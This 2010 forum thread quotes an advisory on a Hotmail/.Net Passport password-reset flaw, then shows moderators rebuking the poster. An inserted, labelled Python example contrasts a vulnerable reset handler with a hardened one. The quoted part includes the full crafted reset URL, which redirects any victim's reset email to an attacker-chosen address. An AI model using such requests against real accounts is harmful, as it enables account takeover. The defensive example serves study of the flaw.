Astahost.com   Mar 17, 2010
Open Discussion & Free Web Hosting > Computers & Tech > Security issues & Exploits

Password Reset Vulnerability


me-here
Is it working now...?

QUOTE
An attacker can reset any Microsoft Hotmail/.Net Passport user account
with no prior information like state, zip, country, answer to the secret
question and the old password. Normally, a user has to answer the
security questions and then answer the secret question if he wants to
reset his password. By exploiting this vulnerability, an attacker can
submit a specially crafted URL to get the password reset instructions
and reset any user's password.

TECHNICAL DETAILS

Due to the nature of this vulnerability and the fact that there is no
fix available yet, no technical details are being made available with
this advisory. Full technical details will be made available on our
website once the vulnerability is fixed by Microsoft. Please note that
we were forced to release this information publicly as these
vulnerabilities are actively being exploited in the wild and are one of
the most severe vulnerabilities ever found in Microsoft Hotmail/.Net
Passport.


The flaw is exploited by opening the following URL in a web browser:

https://register.passport.net/emailpwdreset.srf?lc=1033
&em=victim@hotmail.com&id=&cb=&prefem=where-to@send-the-email.com&rst=

After that, the URL which resets the password will be delivered, in this case, to where-to@send-the-email.com.
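
An added example, not part of the original post and not Microsoft's code: a minimal Python model of the flaw as the post describes it (the reset mail goes to the request's `prefem` value) beside a handler that takes the destination only from the server-side account record. The account store, host name and function names are assumptions; `em` and `prefem` are the parameter names from the URL above.

```python
import hashlib
import secrets
from urllib.parse import parse_qs, urlsplit

# Constructed sample data: account -> recovery address verified at sign-up.
ACCOUNTS = {"alice@example.com": "alice.backup@example.net"}
RESET_TOKENS = {}  # sha256(token) -> account; only the hash is stored

# Constructed request using the post's parameter names on a placeholder host.
SAMPLE_URL = ("https://reset.example/emailpwdreset"
              "?em=alice@example.com&prefem=mallory@example.org")

def _params(url):
    q = parse_qs(urlsplit(url).query, keep_blank_values=True)
    return q.get("em", [""])[0].lower(), q.get("prefem", [""])[0]

def _issue_token(account):
    token = secrets.token_urlsafe(32)
    RESET_TOKENS[hashlib.sha256(token.encode()).hexdigest()] = account
    return token

def reset_flawed(url):
    """Model of the described flaw: recipient is whatever 'prefem' says."""
    account, prefem = _params(url)
    if account not in ACCOUNTS:
        return None
    return prefem, _issue_token(account)

def reset_hardened(url):
    """Recipient comes only from the stored record; 'prefem' is ignored."""
    account, _ignored = _params(url)
    recovery = ACCOUNTS.get(account)
    if recovery is None:
        return None  # the caller shows the same response in both cases
    return recovery, _issue_token(account)

def redeem(token):
    """Single use: the stored hash is removed the first time it matches."""
    return RESET_TOKENS.pop(hashlib.sha256(token.encode()).hexdigest(), None)

if __name__ == "__main__":
    print("flawed   ->", reset_flawed(SAMPLE_URL)[0])
    print("hardened ->", reset_hardened(SAMPLE_URL)[0])
```

Each function returns the pair (recipient, token) that a mailer would use, so the difference between the two handlers is visible in the first element alone.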

 

 

 



miCRoSCoPiC^eaRthLinG
For God's sake, try and provide SOME ORIGINAL INPUT ON YOUR OWN PART. I'm getting tired of warning you and deleting such posts. Don't you have any goddamned opinion on anything on your own? Or do you simply specialize in posting quoted material from other sites?


jlhaslip
O.o, never seen M^E this mad before. Musta really got under his skin...


Logan Deathbringer
Yes, the ability to reset a password on the hotmail/msn network is possible, much like the quoted material you posted states. They are currently working on, or have fixed, that problem already. As for how to do it, that's above my knowledge level, or to be more precise, not what I like to do for fun on my evenings off.

As for the post...I have to agree with M^E, of the couple of posts of yours that I have run across they are, umm...Juvenile at best, or in my opinion just this side of spam. Please feel free to contribute to the community, I would love to see you become a strong member here, but please don't post like this anymore, otherwise M^E, Moonwitch, or another of the mods might decide that banning might be the best option.
